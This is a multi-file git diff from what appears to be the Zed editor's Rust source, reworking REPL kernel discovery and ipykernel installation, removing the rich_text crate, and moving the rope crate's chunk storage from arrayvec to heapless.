f6bf30f394d2232750f7f1beb21dbbc27c0ba941..fc5ccaf75a5b25ba9b32db68e47a96d876f68cf7 100644 --- a/crates/repl/src/outputs/table.rs +++ b/crates/repl/src/outputs/table.rs @@ -59,7 +59,7 @@ use runtimelib::datatable::TableSchema; use runtimelib::media::datatable::TabularDataResource; use 
serde_json::Value; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{IntoElement, Styled, div, prelude::*, v_flex}; use util::markdown::MarkdownEscaped; diff --git a/crates/repl/src/repl.rs b/crates/repl/src/repl.rs index f17cf8dfba5f5e0e950bd5f2967a6b20d2eebb51..8c3d15a2ad2dfdd18976d750c71e2b3cfb0393a4 100644 --- a/crates/repl/src/repl.rs +++ b/crates/repl/src/repl.rs @@ -46,11 +46,9 @@ fn zed_dispatcher(cx: &mut App) -> impl Dispatcher { impl Dispatcher for ZedDispatcher { #[track_caller] fn dispatch(&self, runnable: Runnable) { - use std::sync::{Arc, atomic::AtomicBool}; let location = core::panic::Location::caller(); - let closed = Arc::new(AtomicBool::new(false)); let (wrapper, task) = async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn(|_| async move { runnable.run() }, { let dispatcher = self.dispatcher.clone(); move |r| dispatcher.dispatch(r, Priority::default()) @@ -61,11 +59,9 @@ fn zed_dispatcher(cx: &mut App) -> impl Dispatcher { #[track_caller] fn dispatch_after(&self, duration: Duration, runnable: Runnable) { - use std::sync::{Arc, atomic::AtomicBool}; let location = core::panic::Location::caller(); - let closed = Arc::new(AtomicBool::new(false)); let (wrapper, task) = async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn(|_| async move { runnable.run() }, { let dispatcher = self.dispatcher.clone(); move |r| dispatcher.dispatch_after(duration, r) diff --git a/crates/repl/src/repl_editor.rs b/crates/repl/src/repl_editor.rs index 6e061c3e2e37aa94074f17f94791ad147f56f344..61bed513a16c3b9baf885714110c3de78a7094d5 100644 --- a/crates/repl/src/repl_editor.rs +++ b/crates/repl/src/repl_editor.rs @@ -87,6 +87,7 @@ pub fn install_ipykernel_and_assign( let python_path = env_spec.path.clone(); let env_name = env_spec.name.clone(); + let is_uv = env_spec.is_uv(); let env_spec = 
env_spec.clone(); struct IpykernelInstall; @@ -109,11 +110,25 @@ pub fn install_ipykernel_and_assign( let window_handle = window.window_handle(); let install_task = cx.background_spawn(async move { - let output = util::command::new_command(python_path.to_string_lossy().as_ref()) - .args(&["-m", "pip", "install", "ipykernel"]) - .output() - .await - .context("failed to run pip install ipykernel")?; + let output = if is_uv { + util::command::new_command("uv") + .args(&[ + "pip", + "install", + "ipykernel", + "--python", + &python_path.to_string_lossy(), + ]) + .output() + .await + .context("failed to run uv pip install ipykernel")? + } else { + util::command::new_command(python_path.to_string_lossy().as_ref()) + .args(&["-m", "pip", "install", "ipykernel"]) + .output() + .await + .context("failed to run pip install ipykernel")? + }; if output.status.success() { anyhow::Ok(()) @@ -146,6 +161,11 @@ pub fn install_ipykernel_and_assign( window_handle .update(cx, |_, window, cx| { + let store = ReplStore::global(cx); + store.update(cx, |store, cx| { + store.mark_ipykernel_installed(cx, &env_spec); + }); + let updated_spec = KernelSpecification::PythonEnv(PythonEnvKernelSpecification { has_ipykernel: true, @@ -191,6 +211,7 @@ pub fn run( if !store.read(cx).is_enabled() { return Ok(()); } + store.update(cx, |store, cx| store.ensure_kernelspecs(cx)); let editor = editor.upgrade().context("editor was dropped")?; let selected_range = editor @@ -636,12 +657,9 @@ fn language_supported(language: &Arc, cx: &mut App) -> bool { let store = ReplStore::global(cx); let store_read = store.read(cx); - // Since we're just checking for general language support, we only need to look at - // the pure Jupyter kernels - these are all the globally available ones - store_read.pure_jupyter_kernel_specifications().any(|spec| { - // Convert to lowercase for case-insensitive comparison since kernels might report "python" while our language is "Python" - spec.language().as_ref().to_lowercase() == 
language.name().as_ref().to_lowercase() - }) + store_read + .pure_jupyter_kernel_specifications() + .any(|spec| language.matches_kernel_language(spec.language().as_ref())) } fn get_language(editor: WeakEntity, cx: &mut App) -> Option> { diff --git a/crates/repl/src/repl_sessions_ui.rs b/crates/repl/src/repl_sessions_ui.rs index 1dc2107adde84d4625ffee489805570cd7e5f791..9781382fc85d5da549a65dce2ca06fef4a3bff15 100644 --- a/crates/repl/src/repl_sessions_ui.rs +++ b/crates/repl/src/repl_sessions_ui.rs @@ -204,7 +204,8 @@ impl Render for ReplSessionsPage { fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { let store = ReplStore::global(cx); - let (kernel_specifications, sessions) = store.update(cx, |store, _cx| { + let (kernel_specifications, sessions) = store.update(cx, |store, cx| { + store.ensure_kernelspecs(cx); ( store .pure_jupyter_kernel_specifications() diff --git a/crates/repl/src/repl_settings.rs b/crates/repl/src/repl_settings.rs index 302164a5b360157edceff1b1f2e18f6c6fd7a50b..5fd7623bb71e6446b8cacd6029108e481efc8680 100644 --- a/crates/repl/src/repl_settings.rs +++ b/crates/repl/src/repl_settings.rs @@ -27,11 +27,6 @@ pub struct ReplSettings { /// /// Default: 0 pub output_max_height_lines: usize, - /// Maximum number of columns of output to display before scaling images. - /// Set to 0 to disable output width limits. 
- /// - /// Default: 0 - pub output_max_width_columns: usize, } impl Settings for ReplSettings { @@ -44,7 +39,6 @@ impl Settings for ReplSettings { inline_output: repl.inline_output.unwrap_or(true), inline_output_max_length: repl.inline_output_max_length.unwrap_or(50), output_max_height_lines: repl.output_max_height_lines.unwrap_or(0), - output_max_width_columns: repl.output_max_width_columns.unwrap_or(0), } } } diff --git a/crates/repl/src/repl_store.rs b/crates/repl/src/repl_store.rs index 1c6ce99c2177260c1b9aaf1733326ddbda85a64f..4c5827b7c0cf881725b2937cc0aef0b7e241f0f3 100644 --- a/crates/repl/src/repl_store.rs +++ b/crates/repl/src/repl_store.rs @@ -8,12 +8,13 @@ use gpui::{App, Context, Entity, EntityId, Global, SharedString, Subscription, T use jupyter_websocket_client::RemoteServer; use language::{Language, LanguageName}; use project::{Fs, Project, ProjectPath, WorktreeId}; +use remote::RemoteConnectionOptions; use settings::{Settings, SettingsStore}; use util::rel_path::RelPath; use crate::kernels::{ - Kernel, list_remote_kernelspecs, local_kernel_specifications, python_env_kernel_specifications, - wsl_kernel_specifications, + Kernel, PythonEnvKernelSpecification, list_remote_kernelspecs, local_kernel_specifications, + python_env_kernel_specifications, wsl_kernel_specifications, }; use crate::{JupyterSettings, KernelSpecification, Session}; @@ -26,10 +27,12 @@ pub struct ReplStore { enabled: bool, sessions: HashMap>, kernel_specifications: Vec, + kernelspecs_initialized: bool, selected_kernel_for_worktree: HashMap, kernel_specifications_for_worktree: HashMap>, active_python_toolchain_for_worktree: HashMap, remote_worktrees: HashSet, + fetching_python_kernelspecs: HashSet, _subscriptions: Vec, } @@ -38,12 +41,6 @@ impl ReplStore { pub(crate) fn init(fs: Arc, cx: &mut App) { let store = cx.new(move |cx| Self::new(fs, cx)); - - #[cfg(not(feature = "test-support"))] - store - .update(cx, |store, cx| store.refresh_kernelspecs(cx)) - .detach_and_log_err(cx); - 
cx.set_global(GlobalReplStore(store)) } @@ -64,11 +61,13 @@ impl ReplStore { enabled: JupyterSettings::enabled(cx), sessions: HashMap::default(), kernel_specifications: Vec::new(), + kernelspecs_initialized: false, _subscriptions: subscriptions, kernel_specifications_for_worktree: HashMap::default(), selected_kernel_for_worktree: HashMap::default(), active_python_toolchain_for_worktree: HashMap::default(), remote_worktrees: HashSet::default(), + fetching_python_kernelspecs: HashSet::default(), }; this.on_enabled_changed(cx); this @@ -137,14 +136,43 @@ impl ReplStore { cx.notify(); } + pub fn mark_ipykernel_installed( + &mut self, + cx: &mut Context, + spec: &PythonEnvKernelSpecification, + ) { + for specs in self.kernel_specifications_for_worktree.values_mut() { + for kernel_spec in specs.iter_mut() { + if let KernelSpecification::PythonEnv(env_spec) = kernel_spec { + if env_spec == spec { + env_spec.has_ipykernel = true; + } + } + } + } + cx.notify(); + } + pub fn refresh_python_kernelspecs( &mut self, worktree_id: WorktreeId, project: &Entity, cx: &mut Context, ) -> Task> { + if !self.fetching_python_kernelspecs.insert(worktree_id) { + return Task::ready(Ok(())); + } + let is_remote = project.read(cx).is_remote(); - let kernel_specifications = python_env_kernel_specifications(project, worktree_id, cx); + // WSL does require access to global kernel specs, so we only exclude remote worktrees that aren't WSL. 
+ // TODO: a better way to handle WSL vs SSH/remote projects, + let is_wsl_remote = project + .read(cx) + .remote_connection_options(cx) + .map_or(false, |opts| { + matches!(opts, RemoteConnectionOptions::Wsl(_)) + }); + let kernel_specifications_task = python_env_kernel_specifications(project, worktree_id, cx); let active_toolchain = project.read(cx).active_toolchain( ProjectPath { worktree_id, @@ -155,9 +183,15 @@ impl ReplStore { ); cx.spawn(async move |this, cx| { - let kernel_specifications = kernel_specifications - .await - .context("getting python kernelspecs")?; + let kernel_specifications_res = kernel_specifications_task.await; + + this.update(cx, |this, _cx| { + this.fetching_python_kernelspecs.remove(&worktree_id); + }) + .ok(); + + let kernel_specifications = + kernel_specifications_res.context("getting python kernelspecs")?; let active_toolchain_path = active_toolchain.await.map(|toolchain| toolchain.path); @@ -168,7 +202,7 @@ impl ReplStore { this.active_python_toolchain_for_worktree .insert(worktree_id, path); } - if is_remote { + if is_remote && !is_wsl_remote { this.remote_worktrees.insert(worktree_id); } else { this.remote_worktrees.remove(&worktree_id); @@ -207,10 +241,17 @@ impl ReplStore { } } + pub fn ensure_kernelspecs(&mut self, cx: &mut Context) { + if self.kernelspecs_initialized { + return; + } + self.kernelspecs_initialized = true; + self.refresh_kernelspecs(cx).detach_and_log_err(cx); + } + pub fn refresh_kernelspecs(&mut self, cx: &mut Context) -> Task> { let local_kernel_specifications = local_kernel_specifications(self.fs.clone()); let wsl_kernel_specifications = wsl_kernel_specifications(cx.background_executor().clone()); - let remote_kernel_specifications = self.get_remote_kernel_specifications(cx); let all_specs = cx.background_spawn(async move { @@ -289,7 +330,6 @@ impl ReplStore { } let language_at_cursor = language_at_cursor?; - let language_name = language_at_cursor.code_fence_block_name().to_lowercase(); // Prefer the 
recommended (active toolchain) kernel if it has ipykernel if let Some(active_path) = self.active_python_toolchain_path(worktree_id) { @@ -297,7 +337,7 @@ impl ReplStore { .kernel_specifications_for_worktree(worktree_id) .find(|spec| { spec.has_ipykernel() - && spec.language().as_ref().to_lowercase() == language_name + && language_at_cursor.matches_kernel_language(spec.language().as_ref()) && spec.path().as_ref() == active_path.as_ref() }) .cloned(); @@ -312,7 +352,7 @@ impl ReplStore { .find(|spec| { matches!(spec, KernelSpecification::PythonEnv(_)) && spec.has_ipykernel() - && spec.language().as_ref().to_lowercase() == language_name + && language_at_cursor.matches_kernel_language(spec.language().as_ref()) }) .cloned(); if python_env.is_some() { @@ -350,10 +390,10 @@ impl ReplStore { return Some(found_by_name); } - let language_name = language_at_cursor.code_fence_block_name().to_lowercase(); self.kernel_specifications_for_worktree(worktree_id) .find(|spec| { - spec.has_ipykernel() && spec.language().as_ref().to_lowercase() == language_name + spec.has_ipykernel() + && language_at_cursor.matches_kernel_language(spec.language().as_ref()) }) .cloned() } diff --git a/crates/reqwest_client/Cargo.toml b/crates/reqwest_client/Cargo.toml index 41fcd1f5d2f8ca1c78b0a2261a7c48566999e0de..105a3e7df81be5e125477968cf8e8751dfbb9e78 100644 --- a/crates/reqwest_client/Cargo.toml +++ b/crates/reqwest_client/Cargo.toml @@ -31,4 +31,3 @@ gpui_util.workspace = true http_client_tls.workspace = true [dev-dependencies] -gpui.workspace = true diff --git a/crates/rich_text/Cargo.toml b/crates/rich_text/Cargo.toml deleted file mode 100644 index 17bd8d2a4b8977b2bf0079b84dc8f27a9999974b..0000000000000000000000000000000000000000 --- a/crates/rich_text/Cargo.toml +++ /dev/null @@ -1,29 +0,0 @@ -[package] -name = "rich_text" -version = "0.1.0" -edition.workspace = true -publish.workspace = true -license = "GPL-3.0-or-later" - -[lints] -workspace = true - -[lib] -path = "src/rich_text.rs" -doctest 
= false - -[features] -test-support = [ - "gpui/test-support", - "util/test-support", -] - -[dependencies] -futures.workspace = true -gpui.workspace = true -language.workspace = true -linkify.workspace = true -pulldown-cmark.workspace = true -theme.workspace = true -ui.workspace = true -util.workspace = true diff --git a/crates/rich_text/src/rich_text.rs b/crates/rich_text/src/rich_text.rs deleted file mode 100644 index 2af9988f032c5dc9651e1da6e8c3b52c6c668866..0000000000000000000000000000000000000000 --- a/crates/rich_text/src/rich_text.rs +++ /dev/null @@ -1,418 +0,0 @@ -use futures::FutureExt; -use gpui::{ - AnyElement, AnyView, App, ElementId, FontStyle, FontWeight, HighlightStyle, InteractiveText, - IntoElement, SharedString, StrikethroughStyle, StyledText, UnderlineStyle, Window, -}; -use language::{HighlightId, Language, LanguageRegistry}; -use std::{ops::Range, sync::Arc}; -use theme::ActiveTheme; -use ui::LinkPreview; -use util::RangeExt; - -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum Highlight { - Code, - Id(HighlightId), - InlineCode(bool), - Highlight(HighlightStyle), - Mention, - SelfMention, -} - -impl From for Highlight { - fn from(style: HighlightStyle) -> Self { - Self::Highlight(style) - } -} - -impl From for Highlight { - fn from(style: HighlightId) -> Self { - Self::Id(style) - } -} - -#[derive(Clone, Default)] -pub struct RichText { - pub text: SharedString, - pub highlights: Vec<(Range, Highlight)>, - pub link_ranges: Vec>, - pub link_urls: Arc<[String]>, - - pub custom_ranges: Vec>, - custom_ranges_tooltip_fn: - Option, &mut Window, &mut App) -> Option>>, -} - -/// Allows one to specify extra links to the rendered markdown, which can be used -/// for e.g. mentions. 
-#[derive(Debug)] -pub struct Mention { - pub range: Range, - pub is_self_mention: bool, -} - -impl RichText { - pub fn new( - block: String, - mentions: &[Mention], - language_registry: &Arc, - ) -> Self { - let mut text = String::new(); - let mut highlights = Vec::new(); - let mut link_ranges = Vec::new(); - let mut link_urls = Vec::new(); - render_markdown_mut( - &block, - mentions, - language_registry, - None, - &mut text, - &mut highlights, - &mut link_ranges, - &mut link_urls, - ); - text.truncate(text.trim_end().len()); - - RichText { - text: SharedString::from(text), - link_urls: link_urls.into(), - link_ranges, - highlights, - custom_ranges: Vec::new(), - custom_ranges_tooltip_fn: None, - } - } - - pub fn set_tooltip_builder_for_custom_ranges( - &mut self, - f: impl Fn(usize, Range, &mut Window, &mut App) -> Option + 'static, - ) { - self.custom_ranges_tooltip_fn = Some(Arc::new(f)); - } - - pub fn element(&self, id: ElementId, window: &mut Window, cx: &mut App) -> AnyElement { - let theme = cx.theme(); - let code_background = theme.colors().surface_background; - - InteractiveText::new( - id, - StyledText::new(self.text.clone()).with_default_highlights( - &window.text_style(), - self.highlights.iter().map(|(range, highlight)| { - ( - range.clone(), - match highlight { - Highlight::Code => HighlightStyle { - background_color: Some(code_background), - ..Default::default() - }, - Highlight::Id(id) => HighlightStyle { - background_color: Some(code_background), - ..id.style(theme.syntax()).unwrap_or_default() - }, - Highlight::InlineCode(link) => { - if *link { - HighlightStyle { - background_color: Some(code_background), - underline: Some(UnderlineStyle { - thickness: 1.0.into(), - ..Default::default() - }), - ..Default::default() - } - } else { - HighlightStyle { - background_color: Some(code_background), - ..Default::default() - } - } - } - Highlight::Highlight(highlight) => *highlight, - Highlight::Mention => HighlightStyle { - font_weight: 
Some(FontWeight::BOLD), - ..Default::default() - }, - Highlight::SelfMention => HighlightStyle { - font_weight: Some(FontWeight::BOLD), - ..Default::default() - }, - }, - ) - }), - ), - ) - .on_click(self.link_ranges.clone(), { - let link_urls = self.link_urls.clone(); - move |ix, _, cx| { - let url = &link_urls[ix]; - if url.starts_with("http") { - cx.open_url(url); - } - } - }) - .tooltip({ - let link_ranges = self.link_ranges.clone(); - let link_urls = self.link_urls.clone(); - let custom_tooltip_ranges = self.custom_ranges.clone(); - let custom_tooltip_fn = self.custom_ranges_tooltip_fn.clone(); - move |idx, window, cx| { - for (ix, range) in link_ranges.iter().enumerate() { - if range.contains(&idx) { - return Some(LinkPreview::new(&link_urls[ix], cx)); - } - } - for range in &custom_tooltip_ranges { - if range.contains(&idx) - && let Some(f) = &custom_tooltip_fn - { - return f(idx, range.clone(), window, cx); - } - } - None - } - }) - .into_any_element() - } -} - -pub fn render_markdown_mut( - block: &str, - mut mentions: &[Mention], - language_registry: &Arc, - language: Option<&Arc>, - text: &mut String, - highlights: &mut Vec<(Range, Highlight)>, - link_ranges: &mut Vec>, - link_urls: &mut Vec, -) { - use pulldown_cmark::{CodeBlockKind, Event, Options, Parser, Tag, TagEnd}; - - let mut bold_depth = 0; - let mut italic_depth = 0; - let mut strikethrough_depth = 0; - let mut link_url = None; - let mut current_language = None; - let mut list_stack = Vec::new(); - - let mut options = Options::all(); - options.remove(pulldown_cmark::Options::ENABLE_DEFINITION_LIST); - - for (event, source_range) in Parser::new_ext(block, options).into_offset_iter() { - let prev_len = text.len(); - match event { - Event::Text(t) => { - if let Some(language) = ¤t_language { - render_code(text, highlights, t.as_ref(), language); - } else { - while let Some(mention) = mentions.first() { - if !source_range.contains_inclusive(&mention.range) { - break; - } - mentions = 
&mentions[1..]; - let range = (prev_len + mention.range.start - source_range.start) - ..(prev_len + mention.range.end - source_range.start); - highlights.push(( - range.clone(), - if mention.is_self_mention { - Highlight::SelfMention - } else { - Highlight::Mention - }, - )); - } - - text.push_str(t.as_ref()); - let mut style = HighlightStyle::default(); - if bold_depth > 0 { - style.font_weight = Some(FontWeight::BOLD); - } - if italic_depth > 0 { - style.font_style = Some(FontStyle::Italic); - } - if strikethrough_depth > 0 { - style.strikethrough = Some(StrikethroughStyle { - thickness: 1.0.into(), - ..Default::default() - }); - } - let last_run_len = if let Some(link_url) = link_url.clone() { - link_ranges.push(prev_len..text.len()); - link_urls.push(link_url); - style.underline = Some(UnderlineStyle { - thickness: 1.0.into(), - ..Default::default() - }); - prev_len - } else { - // Manually scan for links - let mut finder = linkify::LinkFinder::new(); - finder.kinds(&[linkify::LinkKind::Url]); - let mut last_link_len = prev_len; - for link in finder.links(&t) { - let start = link.start(); - let end = link.end(); - let range = (prev_len + start)..(prev_len + end); - link_ranges.push(range.clone()); - link_urls.push(link.as_str().to_string()); - - // If there is a style before we match a link, we have to add this to the highlighted ranges - if style != HighlightStyle::default() && last_link_len < link.start() { - highlights.push(( - last_link_len..link.start(), - Highlight::Highlight(style), - )); - } - - highlights.push(( - range, - Highlight::Highlight(HighlightStyle { - underline: Some(UnderlineStyle { - thickness: 1.0.into(), - ..Default::default() - }), - ..style - }), - )); - - last_link_len = end; - } - last_link_len - }; - - if style != HighlightStyle::default() && last_run_len < text.len() { - let mut new_highlight = true; - if let Some((last_range, last_style)) = highlights.last_mut() - && last_range.end == last_run_len - && last_style == 
&Highlight::Highlight(style) - { - last_range.end = text.len(); - new_highlight = false; - } - if new_highlight { - highlights - .push((last_run_len..text.len(), Highlight::Highlight(style))); - } - } - } - } - Event::Code(t) => { - text.push_str(t.as_ref()); - let is_link = link_url.is_some(); - - if let Some(link_url) = link_url.clone() { - link_ranges.push(prev_len..text.len()); - link_urls.push(link_url); - } - - highlights.push((prev_len..text.len(), Highlight::InlineCode(is_link))) - } - Event::Start(tag) => match tag { - Tag::Paragraph => new_paragraph(text, &mut list_stack), - Tag::Heading { .. } => { - new_paragraph(text, &mut list_stack); - bold_depth += 1; - } - Tag::CodeBlock(kind) => { - new_paragraph(text, &mut list_stack); - current_language = if let CodeBlockKind::Fenced(language) = kind { - language_registry - .language_for_name(language.as_ref()) - .now_or_never() - .and_then(Result::ok) - } else { - language.cloned() - } - } - Tag::Emphasis => italic_depth += 1, - Tag::Strong => bold_depth += 1, - Tag::Strikethrough => strikethrough_depth += 1, - Tag::Link { dest_url, .. } => link_url = Some(dest_url.to_string()), - Tag::List(number) => { - list_stack.push((number, false)); - } - Tag::Item => { - let len = list_stack.len(); - if let Some((list_number, has_content)) = list_stack.last_mut() { - *has_content = false; - if !text.is_empty() && !text.ends_with('\n') { - text.push('\n'); - } - for _ in 0..len - 1 { - text.push_str(" "); - } - if let Some(number) = list_number { - text.push_str(&format!("{}. 
", number)); - *number += 1; - *has_content = false; - } else { - text.push_str("- "); - } - } - } - _ => {} - }, - Event::End(tag) => match tag { - TagEnd::Heading(_) => bold_depth -= 1, - TagEnd::CodeBlock => current_language = None, - TagEnd::Emphasis => italic_depth -= 1, - TagEnd::Strong => bold_depth -= 1, - TagEnd::Strikethrough => strikethrough_depth -= 1, - TagEnd::Link => link_url = None, - TagEnd::List(_) => drop(list_stack.pop()), - _ => {} - }, - Event::HardBreak => text.push('\n'), - Event::SoftBreak => text.push('\n'), - _ => {} - } - } -} - -pub fn render_code( - text: &mut String, - highlights: &mut Vec<(Range, Highlight)>, - content: &str, - language: &Arc, -) { - let prev_len = text.len(); - text.push_str(content); - let mut offset = 0; - for (range, highlight_id) in language.highlight_text(&content.into(), 0..content.len()) { - if range.start > offset { - highlights.push((prev_len + offset..prev_len + range.start, Highlight::Code)); - } - highlights.push(( - prev_len + range.start..prev_len + range.end, - Highlight::Id(highlight_id), - )); - offset = range.end; - } - if offset < content.len() { - highlights.push((prev_len + offset..prev_len + content.len(), Highlight::Code)); - } -} - -pub fn new_paragraph(text: &mut String, list_stack: &mut Vec<(Option, bool)>) { - let mut is_subsequent_paragraph_of_list = false; - if let Some((_, has_content)) = list_stack.last_mut() { - if *has_content { - is_subsequent_paragraph_of_list = true; - } else { - *has_content = true; - return; - } - } - - if !text.is_empty() { - if !text.ends_with('\n') { - text.push('\n'); - } - text.push('\n'); - } - for _ in 0..list_stack.len().saturating_sub(1) { - text.push_str(" "); - } - if is_subsequent_paragraph_of_list { - text.push_str(" "); - } -} diff --git a/crates/rope/Cargo.toml b/crates/rope/Cargo.toml index 9f0fc2be8a021a4cd43679beefb18a3567452dde..a4273c8abff1a4a3bc9b08a72f0c405f3195c75e 100644 --- a/crates/rope/Cargo.toml +++ b/crates/rope/Cargo.toml @@ -12,7 
+12,7 @@ workspace = true path = "src/rope.rs" [dependencies] -arrayvec = "0.7.1" +heapless.workspace = true log.workspace = true rayon.workspace = true sum_tree.workspace = true diff --git a/crates/rope/src/chunk.rs b/crates/rope/src/chunk.rs index e5a3ed045a7e44e2208941e908718bdf7ee5b00a..96fc743a33190da9c59c029ace9997b1f9407e63 100644 --- a/crates/rope/src/chunk.rs +++ b/crates/rope/src/chunk.rs @@ -1,5 +1,5 @@ use crate::{OffsetUtf16, Point, PointUtf16, TextSummary, Unclipped}; -use arrayvec::ArrayString; +use heapless::String as ArrayString; use std::{cmp, ops::Range}; use sum_tree::Bias; use unicode_segmentation::GraphemeCursor; @@ -29,7 +29,7 @@ pub struct Chunk { newlines: Bitmap, /// If bit[i] is set, then the character at index i is an ascii tab. tabs: Bitmap, - pub text: ArrayString, + pub text: ArrayString, } #[inline(always)] @@ -47,7 +47,11 @@ impl Chunk { #[inline(always)] pub fn new(text: &str) -> Self { - let text = ArrayString::from(text).unwrap(); + let text = { + let mut buf = ArrayString::new(); + buf.push_str(text).unwrap(); + buf + }; const CHUNK_SIZE: usize = 8; @@ -102,6 +106,11 @@ impl Chunk { self.append(Chunk::new(text).as_slice()); } + #[inline(always)] + pub fn prepend_str(&mut self, text: &str) { + self.prepend(Chunk::new(text).as_slice()); + } + #[inline(always)] pub fn append(&mut self, slice: ChunkSlice) { if slice.is_empty() { @@ -113,7 +122,29 @@ impl Chunk { self.chars_utf16 |= slice.chars_utf16 << base_ix; self.newlines |= slice.newlines << base_ix; self.tabs |= slice.tabs << base_ix; - self.text.push_str(slice.text); + self.text.push_str(slice.text).unwrap(); + } + + #[inline(always)] + pub fn prepend(&mut self, slice: ChunkSlice) { + if slice.is_empty() { + return; + } + if self.text.is_empty() { + *self = Chunk::new(slice.text); + return; + } + + let shift = slice.text.len(); + self.chars = slice.chars | (self.chars << shift); + self.chars_utf16 = slice.chars_utf16 | (self.chars_utf16 << shift); + self.newlines = 
slice.newlines | (self.newlines << shift); + self.tabs = slice.tabs | (self.tabs << shift); + + let mut new_text = ArrayString::::new(); + new_text.push_str(slice.text).unwrap(); + new_text.push_str(&self.text).unwrap(); + self.text = new_text; } #[inline(always)] @@ -890,6 +921,24 @@ mod tests { verify_chunk(chunk1.as_slice(), &(str1 + &str2[start_offset..end_offset])); } + #[gpui::test(iterations = 1000)] + fn test_prepend_random_strings(mut rng: StdRng) { + let len1 = rng.random_range(0..=MAX_BASE); + let len2 = rng.random_range(0..=MAX_BASE).saturating_sub(len1); + let str1 = random_string_with_utf8_len(&mut rng, len1); + let str2 = random_string_with_utf8_len(&mut rng, len2); + let mut chunk1 = Chunk::new(&str1); + let chunk2 = Chunk::new(&str2); + let char_offsets = char_offsets_with_end(&str2); + let start_index = rng.random_range(0..char_offsets.len()); + let start_offset = char_offsets[start_index]; + let end_offset = char_offsets[rng.random_range(start_index..char_offsets.len())]; + let slice = chunk2.slice(start_offset..end_offset); + let prefix_text = &str2[start_offset..end_offset]; + chunk1.prepend(slice); + verify_chunk(chunk1.as_slice(), &(prefix_text.to_owned() + &str1)); + } + /// Return the byte offsets for each character in a string. /// /// These are valid offsets to split the string. 
diff --git a/crates/rope/src/rope.rs b/crates/rope/src/rope.rs index 7ab273be7bfa3fa84a608c69174cfcc6a038eac5..d6a4db3396c287e51dceddbc2f67fc0a40cf2c5b 100644 --- a/crates/rope/src/rope.rs +++ b/crates/rope/src/rope.rs @@ -4,7 +4,7 @@ mod point; mod point_utf16; mod unclipped; -use arrayvec::ArrayVec; +use heapless::Vec as ArrayVec; use rayon::iter::{IntoParallelIterator, ParallelIterator as _}; use std::{ cmp, fmt, io, mem, @@ -167,6 +167,11 @@ impl Rope { (), ); + if text.is_empty() { + self.check_invariants(); + return; + } + #[cfg(all(test, not(rust_analyzer)))] const NUM_CHUNKS: usize = 16; #[cfg(not(all(test, not(rust_analyzer))))] @@ -179,7 +184,7 @@ impl Rope { return self.push_large(text); } // 16 is enough as otherwise we will hit the branch above - let mut new_chunks = ArrayVec::<_, NUM_CHUNKS>::new(); + let mut new_chunks = ArrayVec::<_, NUM_CHUNKS, u8>::new(); while !text.is_empty() { let mut split_ix = cmp::min(chunk::MAX_BASE, text.len()); @@ -187,7 +192,7 @@ impl Rope { split_ix -= 1; } let (chunk, remainder) = text.split_at(split_ix); - new_chunks.push(chunk); + new_chunks.push(chunk).unwrap(); text = remainder; } self.chunks @@ -269,6 +274,23 @@ impl Rope { } pub fn push_front(&mut self, text: &str) { + if text.is_empty() { + return; + } + if self.is_empty() { + self.push(text); + return; + } + if self + .chunks + .first() + .is_some_and(|c| c.text.len() + text.len() <= chunk::MAX_BASE) + { + self.chunks + .update_first(|first_chunk| first_chunk.prepend_str(text), ()); + self.check_invariants(); + return; + } let suffix = mem::replace(self, Rope::from(text)); self.append(suffix); } @@ -548,6 +570,48 @@ impl Rope { } } + pub fn starts_with(&self, pattern: &str) -> bool { + if pattern.len() > self.len() { + return false; + } + let mut remaining = pattern; + for chunk in self.chunks_in_range(0..self.len()) { + let Some(chunk) = chunk.get(..remaining.len().min(chunk.len())) else { + return false; + }; + if remaining.starts_with(chunk) { + remaining = 
&remaining[chunk.len()..]; + if remaining.is_empty() { + return true; + } + } else { + return false; + } + } + remaining.is_empty() + } + + pub fn ends_with(&self, pattern: &str) -> bool { + if pattern.len() > self.len() { + return false; + } + let mut remaining = pattern; + for chunk in self.reversed_chunks_in_range(0..self.len()) { + let Some(chunk) = chunk.get(chunk.len() - remaining.len().min(chunk.len())..) else { + return false; + }; + if remaining.ends_with(chunk) { + remaining = &remaining[..remaining.len() - chunk.len()]; + if remaining.is_empty() { + return true; + } + } else { + return false; + } + } + remaining.is_empty() + } + pub fn line_len(&self, row: u32) -> u32 { self.clip_point(Point::new(row, u32::MAX), Bias::Left) .column @@ -629,19 +693,32 @@ impl<'a> Cursor<'a> { } pub fn seek_forward(&mut self, end_offset: usize) { - debug_assert!(end_offset >= self.offset); + assert!( + end_offset >= self.offset, + "cannot seek backward from {} to {}", + self.offset, + end_offset + ); + assert!( + end_offset <= self.rope.len(), + "cannot summarize past end of rope" + ); self.chunks.seek_forward(&end_offset, Bias::Right); self.offset = end_offset; } pub fn slice(&mut self, end_offset: usize) -> Rope { - debug_assert!( + assert!( end_offset >= self.offset, - "cannot slice backwards from {} to {}", + "cannot slice backward from {} to {}", self.offset, end_offset ); + assert!( + end_offset <= self.rope.len(), + "cannot summarize past end of rope" + ); let mut slice = Rope::new(); if let Some(start_chunk) = self.chunks.item() { @@ -666,7 +743,16 @@ impl<'a> Cursor<'a> { } pub fn summary(&mut self, end_offset: usize) -> D { - debug_assert!(end_offset >= self.offset); + assert!( + end_offset >= self.offset, + "cannot summarize backward from {} to {}", + self.offset, + end_offset + ); + assert!( + end_offset <= self.rope.len(), + "cannot summarize past end of rope" + ); let mut summary = D::zero(()); if let Some(start_chunk) = self.chunks.item() { @@ -2168,6 
